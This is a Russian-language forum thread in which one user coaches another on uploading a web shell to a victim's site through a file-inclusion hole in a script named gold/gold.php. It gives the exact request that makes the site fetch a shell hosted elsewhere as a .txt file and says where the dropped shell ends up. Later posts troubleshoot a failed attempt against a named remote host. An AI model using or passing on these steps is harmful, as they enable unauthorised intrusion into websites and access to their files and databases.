Loading...
Сибирский, извени что повторяюсь но как через неё можно шелл грузануть?
ultral, обьясняю как работает )
1 ищите шелл, сохраняете его на своем сайте наприме в файл
site.ru/shell.txt здесь обязательно txt что бы файл во время загрузки не выполнился.
Ишем дырку на сайте жертвы, предположим она в файле
jertva.ru/gold/gold.php
далее набираете такой запрос в строке адреса
jertva.ru/gold/gold.php?miniS=site.ru/shell.txt
и жмем ввод, после обновления в шелл будет лежать по пути
jertva.ru/gold/smurfik.php
Сибирский, СПС за совет.Теперь знаю как работает этот шелл и как его убрать.Лайк в профиль
Сибирский, слушай раз я заинтересовался делами то не мог бы мне скинуть шёл на историю героя?
ultral, нет шелла поод какой то определенный скрипт )) Шелл это автономный скрипт, который работает на сайте и дает возможность доступа к файлам и, если есть данные то и к БД. Но найти шелл не проблема, у меня нет на компе, потому как аваст сразу материться начинает, но в обменнике можно найти всяких )
Сибирский, то есть 1 шёл может взломать кучу сайтов.Я попробовал как ты сказал.У меня просто выявило маленькую ошибку в низу под обменом.Но смурфик.пхп нету такого файла.Попробовал сделал файл загрузить в формате пхп и перешёл по ссылке сайт/gold/smurfik.php а там белый экран
ultral, что в ошибке написано было?
Сибирский, Warning: file_get_contents(sup4ik.ese.es/system.txt) [function.file-get-contents]: failed to open stream: No such file or directory in /home/u236351109/public_html/gold/gold.php on line 129
ultral, пишет что по указанному адресу файл не обнаружен, то есть адрес со ссылкой на шелл ты указываешь неправильно
ultral, кстати в примере я указывал пути без http на самом деле протокол указывать следует
Онлайн: 0
Время:
Gen. 0.1081
(c) Bym.Guru 2010-2025